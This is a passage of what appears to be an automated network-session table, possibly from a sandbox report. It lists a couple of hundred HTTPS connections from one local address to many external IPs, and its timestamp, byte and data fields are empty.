                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25046192.168.2.2340022162.200.67.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25047192.168.2.2351002165.53.45.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25048192.168.2.2358970183.180.141.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25049192.168.2.233784886.116.234.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25050192.168.2.235898238.14.237.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25051192.168.2.234551481.127.218.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25052192.168.2.2359486220.157.106.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25053192.168.2.2348764202.215.223.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25054192.168.2.2355684217.168.124.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25055192.168.2.234978271.62.89.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25056192.168.2.2358996185.184.123.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25057192.168.2.2342318180.184.225.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25058192.168.2.234627688.211.61.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25059192.168.2.2347792104.245.203.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25060192.168.2.2357182213.221.226.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25061192.168.2.234642440.108.137.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25062192.168.2.2337994208.210.235.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25063192.168.2.2339836173.120.95.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25064192.168.2.2340110149.45.117.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25065192.168.2.23478982.40.68.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25066192.168.2.2334588166.215.55.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25067192.168.2.235629420.23.167.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25068192.168.2.234978087.130.2.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25069192.168.2.2348506129.239.1.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25070192.168.2.2344474208.27.62.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25071192.168.2.233351296.47.145.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25072192.168.2.234951460.8.195.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25073192.168.2.235550277.250.189.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25074192.168.2.235057880.197.201.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25075192.168.2.2344134150.233.206.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25076192.168.2.2358132113.173.196.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25077192.168.2.233385059.3.212.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25078192.168.2.234157447.168.175.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25079192.168.2.2355806108.66.39.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25080192.168.2.2335858122.121.221.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25081192.168.2.233622685.27.232.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25082192.168.2.2354708125.78.187.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25083192.168.2.2355654176.135.187.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25084192.168.2.234462832.170.187.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25085192.168.2.2357462110.170.197.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25086192.168.2.235263436.209.39.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25087192.168.2.2350498130.71.136.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25088192.168.2.234672012.240.60.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25089192.168.2.233591041.144.132.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25090192.168.2.2341888181.254.214.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25091192.168.2.233896653.205.6.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25092192.168.2.2341326124.177.253.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25093192.168.2.2351128134.154.173.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25094192.168.2.235197476.161.232.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25095192.168.2.234002691.96.114.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25096192.168.2.2356242115.145.159.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25097192.168.2.2343594123.203.161.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25098192.168.2.235091676.189.58.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25099192.168.2.2337934184.50.127.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25100192.168.2.2354396145.211.141.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25101192.168.2.2353064143.230.234.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25102192.168.2.2347594177.107.222.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25103192.168.2.233376847.63.107.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25104192.168.2.2349030145.223.188.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25105192.168.2.233402632.42.0.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25106192.168.2.234669854.78.249.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25107192.168.2.236066486.64.242.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25108192.168.2.233760471.78.250.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25109192.168.2.2343120171.178.43.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25110192.168.2.2350122139.182.13.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25111192.168.2.234808693.135.56.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25112192.168.2.234403685.172.191.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25113192.168.2.235845259.118.229.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25114192.168.2.2350760143.219.58.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25115192.168.2.2338740211.119.61.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25116192.168.2.233456235.115.139.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25117192.168.2.2351056104.34.103.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25118192.168.2.2358352152.179.190.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25119192.168.2.235312220.112.153.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25120192.168.2.23411945.64.56.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25121192.168.2.23487769.207.232.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25122192.168.2.2348068106.247.236.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25123192.168.2.234120220.140.117.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25124192.168.2.23543941.50.238.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25125192.168.2.236027834.62.114.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25126192.168.2.2354068221.250.65.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25127192.168.2.2353240131.212.199.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25128192.168.2.2341304110.59.226.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25129192.168.2.235825877.75.70.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25130192.168.2.2346028142.79.148.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25131192.168.2.234511646.46.109.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25132192.168.2.234558623.16.252.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25133192.168.2.2334812220.170.199.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25134192.168.2.2338326168.92.253.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25135192.168.2.2354780109.207.72.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25136192.168.2.2349214148.198.44.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25137192.168.2.2335632169.88.89.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25138192.168.2.2356090158.207.104.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25139192.168.2.233657073.97.42.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25140192.168.2.2333060216.214.109.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25141192.168.2.2355410185.42.117.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25142192.168.2.2349450149.73.49.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25143192.168.2.234940447.166.219.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25144192.168.2.2338500136.203.10.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25145192.168.2.2358014120.116.49.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25146192.168.2.2342368178.44.253.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25147192.168.2.235415487.87.164.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25148192.168.2.235764474.157.168.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25149192.168.2.235484684.11.52.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25150192.168.2.234837495.46.137.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25151192.168.2.2343334124.194.64.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25152192.168.2.23369002.159.6.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25153192.168.2.2336554189.61.237.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25154192.168.2.233994271.31.110.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25155192.168.2.2338332135.75.198.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25156192.168.2.233360667.245.1.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25157192.168.2.235043086.160.148.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25158192.168.2.2339122140.122.67.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25159192.168.2.2333884181.203.4.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25160192.168.2.234179252.5.143.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25161192.168.2.23517321.140.234.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25162192.168.2.234579634.244.171.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25163192.168.2.2353286146.200.119.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25164192.168.2.2359966110.38.156.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25165192.168.2.2342388147.204.68.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25166192.168.2.2336338113.136.150.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25167192.168.2.2356376202.60.197.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25168192.168.2.235487617.129.45.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25169192.168.2.2353860158.85.38.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25170192.168.2.2336022157.113.35.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25171192.168.2.2338028133.162.103.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25172192.168.2.2345454111.108.217.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25173192.168.2.2344098188.43.228.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25174192.168.2.2358058164.104.169.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25175192.168.2.234864635.230.213.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25176192.168.2.2360772101.151.13.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25177192.168.2.235810287.210.5.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25178192.168.2.2333476158.53.239.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25179192.168.2.2343758153.31.13.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25180192.168.2.234499023.92.187.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25181192.168.2.234522839.217.42.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25182192.168.2.2359292103.24.222.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25183192.168.2.2337678120.218.98.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25184192.168.2.234192872.118.44.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25185192.168.2.235274439.156.102.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25186192.168.2.2334436120.58.112.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25187192.168.2.2341558186.122.89.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25188192.168.2.2353362172.2.44.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25189192.168.2.2360280186.44.191.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25190192.168.2.2338102180.226.117.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25191192.168.2.2334762146.52.231.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25192192.168.2.234944614.61.92.2428080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25193192.168.2.2360416204.13.34.178080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25194192.168.2.2350870192.147.100.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25195192.168.2.2345866111.43.108.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25196192.168.2.2349734171.245.205.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25197192.168.2.2338034158.155.231.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25198192.168.2.2354636196.43.187.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25199192.168.2.233794652.135.224.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25200192.168.2.2357968191.135.73.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25201192.168.2.2346424128.42.102.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25202192.168.2.2338338128.222.119.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25203192.168.2.23607344.141.149.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25204192.168.2.234713646.172.175.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25205192.168.2.2345182119.178.139.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25206192.168.2.236021062.173.164.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25207192.168.2.2352734155.31.240.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25208192.168.2.235006695.135.170.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25209192.168.2.2344814190.44.232.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25210192.168.2.2356164165.42.37.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25211192.168.2.2357162113.107.222.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25212192.168.2.234837214.26.99.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25213192.168.2.234469864.140.156.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25214192.168.2.2349550201.56.79.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25215192.168.2.2342998183.80.175.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25216192.168.2.234431495.59.106.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25217192.168.2.2347880216.176.74.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25218192.168.2.233467480.176.133.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25219192.168.2.2332990166.5.184.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25220192.168.2.2340300106.66.30.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25221192.168.2.2342888210.60.222.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25222192.168.2.235668451.144.184.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25223192.168.2.234225679.254.73.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25224192.168.2.2335398204.111.165.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25225192.168.2.2346280157.205.204.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25226192.168.2.2359394173.208.255.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25227192.168.2.233846062.196.201.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25228192.168.2.2338520117.213.16.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25229192.168.2.2359822161.4.30.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25230192.168.2.2340736197.96.165.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25231192.168.2.2339448223.35.138.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25232192.168.2.234433886.43.4.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25233192.168.2.2344480175.103.93.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25234192.168.2.2349298202.63.140.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25235192.168.2.2337360198.234.200.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25236192.168.2.23371888.224.92.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25237192.168.2.234480866.181.35.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25238192.168.2.2356184159.65.105.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25239192.168.2.2354794183.167.82.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25240192.168.2.233323659.151.177.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25241192.168.2.2358296212.195.108.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25242192.168.2.2350772217.220.159.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25243192.168.2.2336754155.191.84.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25244192.168.2.234255082.209.39.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25245192.168.2.2345106133.191.206.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25246192.168.2.2354064152.180.28.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25247192.168.2.2347874143.20.125.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25248192.168.2.2355396202.99.95.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25249192.168.2.236005042.206.89.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25250192.168.2.2355174188.159.62.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25251192.168.2.2343770152.37.137.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25252192.168.2.235936278.44.189.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25253192.168.2.235994096.247.15.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25254192.168.2.2335052177.154.3.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25255192.168.2.2355328140.230.225.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25256192.168.2.2335156180.157.169.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25257192.168.2.233354093.90.199.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25258192.168.2.2358972157.138.160.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25259192.168.2.2344932182.93.164.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25260192.168.2.235660052.121.71.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25261192.168.2.234203269.158.44.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25262192.168.2.2348714181.112.205.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25263192.168.2.2347042124.235.141.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25264192.168.2.2358172199.97.125.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25265192.168.2.2334988144.124.1.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25266192.168.2.234390872.64.171.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25267192.168.2.2355952112.189.0.164443
